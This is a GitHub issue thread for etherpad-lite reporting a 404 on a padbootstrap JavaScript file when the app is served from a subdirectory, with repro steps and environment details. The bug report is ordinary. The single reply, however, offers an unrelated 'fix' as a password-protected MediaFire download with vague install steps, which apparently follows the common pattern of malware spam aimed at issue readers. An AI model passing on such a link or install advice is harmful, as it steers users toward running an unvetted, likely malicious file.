### ISSUE TITLE
JavaScript fails to load when deploying in a subdirectory due to an incorrect relative path

### ISSUE THREAD

**Issue by yacchin1205** [ether/etherpad-lite#6620]
**Describe the bug**

JavaScript fails to load when deploying in a subdirectory due to an incorrect relative path

**To Reproduce**

A repository has been prepared for reproduction: https://github.com/yacchin1205/etherpad-lite-relative-path-issue/tree/main

1. Clone this repository
2. Run `docker compose up`
3. Visit `http://localhost:9002/sub/path/etherpad/p/foobar`
4. You will see the following error:

```
foobar:681
 GET http://localhost:9002/sub/path/padbootstrap-AWbfvdxaiSQ.min.js net::ERR_ABORTED 404 (Not Found)
```

**Expected behavior**

The etherpad-lite page should load the padbootstrap-XXXXXXXX.min.js file from the correct path like `http://localhost:9002/sub/path/etherpad/padbootstrap-AWbfvdxaiSQ.min.js`.

**Server (please complete the following information):**
 - Etherpad version: 2.2.2
 - OS: macOS(Host)
 - Node.js version: v22.6.0
 - pnpm version: 9.0.4

**Desktop (please complete the following information):**
 - OS: macOS
 - Browser Chrome
 - Version 128.0.6613.85（Official Build） （arm64）

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
